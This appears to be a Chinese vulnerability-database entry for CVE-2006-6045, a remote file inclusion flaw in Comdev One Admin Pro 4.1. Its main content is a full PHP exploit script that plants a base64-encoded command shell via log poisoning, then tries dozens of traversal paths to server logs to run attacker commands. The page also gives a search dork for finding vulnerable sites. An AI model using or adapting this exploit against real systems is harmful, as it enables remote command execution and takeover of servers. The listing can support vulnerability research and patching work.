Comdev One Admin Pro 4 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111306 漏洞类型 未知
发布时间 2006-10-16 更新时间 2006-11-21
CVE编号 CVE-2006-6045 CNNVD-ID CNNVD-200611-346
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2573
https://www.securityfocus.com/bid/87344
https://cxsecurity.com/issue/WLB-2006110104
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-346
|漏洞详情
ComdevOneAdminPro存在多个PHP远程文件包含漏洞。远程攻击者可以借助传给(1)adminfoot.php,(2)adminhead.php或(3)adminlogin.php中的path[skin]参数当中的URL,执行任意PHP代码。
|漏洞EXP
#!/usr/bin/php
<?php
 /*********************************************************************
 * Comdev One Admin 4.1 Remote Command Execution / File Inclusion Vulnerability
 * 
 * Note:
 * Requires register globals to be on, and magic quotes gpc to be off.
 *
 * Usage: 
 * php script.php [host] [path] [command]
 *
 * Usage Example:
 * php script.php domain.com /oneadminpro/ whoami
 *
 * Credit:
 * Synsta - Vulnerability discovery and exploit scripting
 *
 * File Inclusion:
 * <host>/<path>/oneadmin/adminfoot.php?path[docroot]=<local/remote file>
 *
 * Googledork: inurl:/oneadmin/
 *
 * [w4ck1ng] - w4ck1ng.com
 *
 *********************************************************************/
 
if(!$argv[3 ]){
die("Usage:
php $argv[0] [host] [path] [command]\n
Usage Example:
php $argv[0] domain.com /dolphin/ whoami\n");
}

function send($host, $put){
global $data;
$conn = fsockopen( gethostbyname($host),"80" );
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn, $put);
}
while(!feof($conn)) {
$data .=fgets( $conn);
}
fclose($conn);
return $data;
}

$host = $argv[ 1];
$path = $argv[ 2];
$cmd = $argv[ 3];

if($argv[3]){

$shellcode = base64_decode( "PD9waHAgaWYoJF9TRVJWRVJbSFRUUF9DTURdKXsgZWNobyBjbWR4cGxzdGFydC5zaGVsbF9leGVjKHN0cmlwc2xhc2hlcygkX1NFUlZFUltIVFRQX0NNRF0pKS5jbWR4cGxlbmQ7IH0gPz4=");
$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$shellcode HTTP/1.1\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");

$logs = array("../../../../../var/log/httpd/access_log" ,
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../logs/access_log",
"../../../logs/error_log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log");

$i = 0; 
foreach($logs as $value){ 
$logs[$i++];

$req = "GET ". $path."/oneadmin/adminfoot.php?path[docroot]=$logs[$i]%00 HTTP/1.1\r\n";
$req .="CMD: $cmd\r\n";
$req .="Accept-Encoding: text/plain\r\n" ;
$req .="Host: ". $host."\r\n";
$req .="Connection: Close\r\n\r\n" ;
send("$host", "$req");
print("Trying $logs[$i]..\n");

$adata = explode( "cmdxplstart",$data);
$bdata = explode( "cmdxplend",$adata[1 ]);
$cdata = $bdata[ 0];

if(eregi("cmdxplend",  $data)){ 
if($cdata==NULL){ 
die("\nExploit succeeded but blank command received..\n"); 
}
die("\nExploit Succeeded!\n\nCommand Resolution:\n$cdata\n"); 
}
}
}

die("Exploit Failed!\n");
?>

# milw0rm.com [2006-10-16]
|受影响的产品
Comdev Comdev One Admin Pro 4.1
|参考资料

来源:XF
名称:comdevone-pathskin-file-include(30367)
链接:http://xforce.iss.net/xforce/xfdb/30367
来源:BUGTRAQ
名称:20061115ComdevOneAdminPro.v4.1(path[skin])RemoteFileinclude
链接:http://www.securityfocus.com/archive/1/archive/1/451857/100/0/threaded
来源:VUPEN
名称:ADV-2006-4581
链接:http://www.frsirt.com/english/advisories/2006/4581
来源:SECTRACK
名称:1017247
链接:http://securitytracker.com/id?1017247
来源:SECUNIA
名称:22947
链接:http://secunia.com/advisories/22947
来源:SREASON
名称:1902
链接:http://securityreason.com/securityalert/1902